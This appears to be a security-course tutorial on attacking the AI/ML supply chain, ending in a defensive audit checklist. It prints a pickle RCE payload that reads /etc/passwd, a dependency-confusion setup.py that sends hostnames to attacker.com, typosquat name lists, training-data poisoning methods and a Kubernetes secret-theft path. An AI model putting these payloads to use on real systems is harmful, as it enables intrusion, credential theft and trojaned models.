AI Supply Chain Exploitation

expert9 min readUpdated 2026-03-11

Methodology for exploiting the AI/ML supply chain: model serialization RCE, dependency confusion, dataset poisoning, CI/CD injection, and container escape.

supply-chain pickle serialization rce dependency-confusion cicd container-escape huggingface

AI Supply Chain Exploitation

The AI/ML supply chain relies on implicit trust at every layer: models downloaded as opaque binary blobs, datasets pulled from unverified sources, and training pipelines that execute arbitrary code during preprocessing. Unlike traditional software supply chains with signatures and checksums, the ML ecosystem normalizes running untrusted code as standard practice.

Model Serialization Attacks

Methodology

Craft a basic pickle RCE payload

The __reduce__ method tells pickle how to reconstruct an object. Return os.system with a shell command to achieve code execution on pickle.loads().

import pickle, os
 
class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("id; whoami; cat /etc/passwd",))
 
payload = pickle.dumps(MaliciousModel())
# pickle.loads(payload) triggers RCE

Embed payload in a PyTorch model file
PyTorch's torch.save() uses pickle internally. Create a trojan model that executes a payload during torch.load() while returning valid weights so the victim notices nothing wrong.
Distribute via HuggingFace Hub
Upload the weaponized model to HuggingFace Hub using one of the attack vectors below.

HuggingFace Attack Vectors

Vector	Technique	Detection Difficulty
Typosquatting	Upload model with name similar to popular repo (e.g., `meta-Ilama` vs `meta-llama`)	Low — requires user to notice typo
Malicious custom code	`config.json` points to custom `modeling_*.py` that runs on `trust_remote_code=True`	Medium — code is visible but rarely reviewed
Poisoned tokenizer	Custom `tokenizer_config.json` references executable tokenizer code	High — scanners focus on model files
Model card phishing	README with malicious links directing to trojanized external downloads	Low — social engineering

Safetensors Limitations

Safetensors solves weight storage but has important gaps:

Models may still require pickle for optimizer states, training config, or custom architectures
Loaders may fall back to pickle if safetensors files are missing
trust_remote_code=True executes arbitrary Python regardless of weight format
A model card can claim safetensors format while actual files are pickle

Dependency Confusion and Typosquatting

Dependency confusion exploits the interaction between private and public package indices.

Attack Steps

Identify internal package names
Enumerate internal ML package names from job postings, GitHub repos, error messages, or documentation leaks.

Publish to public PyPI with high version

Create a package with the same name and version 99.0.0. If the target uses --extra-index-url (instead of --index-url), pip installs the higher version from public PyPI.

# setup.py for the malicious package
from setuptools import setup
import os, urllib.request
 
try:
    hostname = os.uname().nodename
    urllib.request.urlopen(f"https://attacker.com/dep-confusion?host={hostname}")
except: pass
 
setup(name="acme-ml-utils", version="99.0.0", packages=["acme_ml_utils"])

Exploit typosquatting for broader targeting
Target commonly mistyped ML package names.

Common Typosquat Targets

Legitimate Package	Typosquat Variants
`transformers`	`transformer`, `transfomers`, `transformrs`
`torch`	`pytoch`, `tourch`, `troch`
`tensorflow`	`tenserflow`, `tensorflw`
`langchain`	`langchian`, `lanchain`
`openai`	`opanai`, `openaii`

Dataset Poisoning

Datasets on HuggingFace Datasets, Kaggle, and academic repositories are consumed with minimal verification. Two primary attack patterns:

Attack	Method	Impact
Public dataset manipulation	Submit PRs adding plausible samples with subtly dangerous advice (e.g., "store API keys in source code")	Shifts model behavior at scale without any single sample being flagged
Data pipeline injection	Compromise external data URLs referenced by training configs, or DNS-hijack the data source	Full control over training data with no integrity check to bypass

CI/CD Pipeline Injection

Vulnerable ML Pipeline Checklist

Audit ML training workflows for these four critical flaws:

Vulnerability	Risk	What to Look For
PR-triggered builds on self-hosted runners	Fork PR executes arbitrary code on GPU infrastructure	`on: pull_request` + `runs-on: [self-hosted, gpu]`
Unpinned dependencies	Dependency substitution during `pip install`	`pip install -r requirements.txt` without version pins or hashes
Secret exposure to PR builds	API keys exfiltrated by fork contributors	`${{ secrets.* }}` in PR-triggered jobs
Unverified data downloads	Training data replaced via MITM or DNS hijack	`python scripts/download_data.py` without integrity checks

Experiment Tracking as Attack Surface

With MLflow tracking server access, an attacker can:

Alter hyperparameters loaded by training runs
Redirect artifact references to malicious model checkpoints
Modify dataset version tags to point to poisoned data
Overwrite production model registrations with trojanized checkpoints

Container Escape in ML Infrastructure

GPU Container Attack Surface

GPU containers expand the standard container attack surface because they typically require:

Requirement	Security Impact
Privileged mode or `/dev/nvidia*` access	Kernel-level escalation paths
NVIDIA Container Toolkit	Additional driver attack surface
Large shared memory (`/dev/shm`)	Cross-container data leakage
NFS mounts for model/data storage	Lateral access to production models and data lakes

GPU Memory Remnant Scanning

On shared GPU infrastructure, previous tenants' data (model weights, training samples, API keys) may persist in uninitialized GPU memory. Allocate uninitialized tensors via torch.empty(..., device='cuda') and scan for non-zero values.

Kubernetes ML Cluster Escalation Path

Compromise the training job
Via poisoned dependency or data pipeline injection.
Read mounted secrets
AWS credentials, HuggingFace tokens from mounted Kubernetes secrets.
Access shared model storage
Replace production models on NFS mounts with trojaned versions.
Pivot to data lake
Exfiltrate training data from shared mounts.
Escape to node
Use privileged container access (privileged: true) for node-level compromise.

Supply Chain Audit Checklist

Area	Key Questions
Model provenance	Checksums verified? `weights_only=True` or safetensors? `trust_remote_code` reviewed? Repos pinned to commits?
Dependencies	Exact version pins? Private PyPI with priority? Hash verification (`--require-hashes`)? Transitive deps audited?
Data integrity	Datasets checksummed? TLS with cert verification? Preprocessing scripts code-reviewed? Provenance tracked?
CI/CD	PR execution restricted? Secrets scoped to branches? Self-hosted runners isolated and ephemeral? Training/deployment separated?
Containers	Running without `--privileged`? GPU memory cleared between tenants? Images scanned? Network egress restricted?

Pickle Exploits — Pickle deserialization is a key supply chain vector
App Security — Application-level security for AI systems

Knowledge Check

Your target uses --extra-index-url for a private PyPI index alongside public PyPI. Why is this vulnerable to dependency confusion?

References

OWASP Machine Learning Security Top 10 — ML-specific supply chain risks
Hugging Face Security — Model hub security documentation
Fickling: Pickle decompiler and static analyzer — Trail of Bits pickle security tool

AI Supply Chain Exploitation

Craft a basic pickle RCE payload

Embed payload in a PyTorch model file

Distribute via HuggingFace Hub

Identify internal package names

Publish to public PyPI with high version

Exploit typosquatting for broader targeting

Compromise the training job

Read mounted secrets

Access shared model storage

Pivot to data lake

Escape to node

Learning Path

Related articles

AI Supply Chain Exploitation

Craft a basic pickle RCE payload

Embed payload in a PyTorch model file

Distribute via HuggingFace Hub

Identify internal package names

Publish to public PyPI with high version

Exploit typosquatting for broader targeting

Compromise the training job

Read mounted secrets

Access shared model storage

Pivot to data lake

Escape to node

Learning Path

Related articles